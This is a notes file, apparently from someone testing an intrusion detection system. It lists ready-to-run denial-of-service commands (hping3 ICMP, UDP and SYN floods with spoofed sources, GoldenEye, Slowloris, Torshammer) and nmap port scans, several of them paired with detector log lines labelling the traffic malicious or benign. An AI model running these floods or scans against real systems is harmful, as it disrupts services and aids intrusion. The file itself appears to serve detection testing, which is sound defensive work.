Attack tool with commands:

* DOS ATTACK *
- Hping3: https://cyberwar.nl/d/cheatsheets/hping3_cheatsheet_v1.0-ENG.pdf 
	+ ICMP Flood:
	> sudo hping3 --flood --rand-source -1 -p “Targeted port/Range of ports” “Target IP address”
	11 detected
	1336,23:11:02-07/05/2025,Malicious,ICMPFlood,Hping3
	
	+ UDP Flood:
	> sudo hping3 --flood --rand-source -2 -p “Targeted port/range of ports” “Target IP address”
	n detected
	1,23:21:58-07/05/2025,Malicious,UDPFlood,Hping3
	2,23:21:58-07/05/2025,Malicious,UDPFlood,Hping3
	3,23:21:58-07/05/2025,Malicious,UDPFlood,Hping3
	4,23:21:58-07/05/2025,Malicious,UDPFlood,Hping3
	5,23:21:58-07/05/2025,Malicious,UDPFlood,Hping3
	6,23:21:58-07/05/2025,Malicious,UDPFlood,Hping3
	7,23:21:58-07/05/2025,Malicious,UDPFlood,Hping3
	8,23:21:58-07/05/2025,Malicious,UDPFlood,Hping3
	9,23:21:58-07/05/2025,Malicious,UDPFlood,Hping3
	
	+ SYN Flood:
	> sudo hping3 -S --flood --rand-source -p “Targeted port/range of ports” “Target IP address”
	n detected
	2538,23:25:19-07/05/2025,Malicious,SYNFlood,Hping3
	2539,23:25:19-07/05/2025,Malicious,SYNFlood,Hping3
	2540,23:25:19-07/05/2025,Malicious,SYNFlood,Hping3
	2541,23:25:19-07/05/2025,Malicious,SYNFlood,Hping3
	2542,23:25:19-07/05/2025,Malicious,SYNFlood,Hping3
	2543,23:25:19-07/05/2025,Malicious,SYNFlood,Hping3
	2544,23:25:19-07/05/2025,Malicious,SYNFlood,Hping3
	2545,23:25:19-07/05/2025,Malicious,SYNFlood,Hping3
	2546,23:25:19-07/05/2025,Malicious,SYNFlood,Hping3
	
- Golden Eye:
	+ HTTP Flood:
	> sudo python3 ./goldeneye.py http://“Target IP address of the web server”
	> sudo python3 goldeneye.py http://127.0.0.1:80 -u "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/129.0.6668.102 Safari/537.36 (AirWatch Browser v22.05.0.4)" -m random 
	CHUA
- Slowloris:
	+ Slowrate Dos:
	> python3 slowloris.py “Target IP address of the web server”
	> python3 slowloris.py 127.0.0.1:80
	> THAY THE: netstat -ntu -4 -6 |  awk '/^tcp/{ print $5 }' | sed -r 's/:[0-9]+$//' |  sort | uniq -c | sort -n
- Torshammer:
	+ POST request DoS
	> python2 torshammer.py -t “Target IP address of the web server”
	
* PORT Scan *
- Nmap:
	+ SYN Scan:
	> nmap -sS -p- "IP address" -vv -T4 -A
	69,23:56:04-07/05/2025,Benign,Benign,Benign
	70,23:56:04-07/05/2025,Malicious,SYNScan,Nmap
	71,23:56:04-07/05/2025,Malicious,SYNScan,Nmap
	72,23:56:04-07/05/2025,Malicious,SYNScan,Nmap
	73,23:56:04-07/05/2025,Malicious,SYNScan,Nmap
	74,23:56:04-07/05/2025,Malicious,SYNScan,Nmap
	75,23:56:04-07/05/2025,Malicious,SYNScan,Nmap
	76,23:56:04-07/05/2025,Malicious,SYNScan,Nmap
	77,23:56:04-07/05/2025,Malicious,SYNScan,Nmap
	
	+ TCP Connect Scan:
	> nmap -sT -p- "IP address" -vv
	
	CHUA
	+ UDP Scan:
	> nmap -sU -p- "IP address" -vv
	15,00:02:32-08/05/2025,Malicious,UDPScan,Nmap
	16,00:02:32-08/05/2025,Benign,Benign,Benign
	17,00:02:32-08/05/2025,Malicious,UDPScan,Nmap
	18,00:02:32-08/05/2025,Benign,Benign,Benign
	19,00:02:32-08/05/2025,Malicious,UDPScan,Nmap
	20,00:02:32-08/05/2025,Benign,Benign,Benign
	21,00:02:32-08/05/2025,Malicious,UDPScan,Nmap
	22,00:02:32-08/05/2025,Benign,Benign,Benign
	23,00:02:32-08/05/2025,Malicious,UDPScan,Nmap
	24,00:02:32-08/05/2025,Benign,Benign,Benign
	25,00:02:32-08/05/2025,Malicious,UDPScan,Nmap 
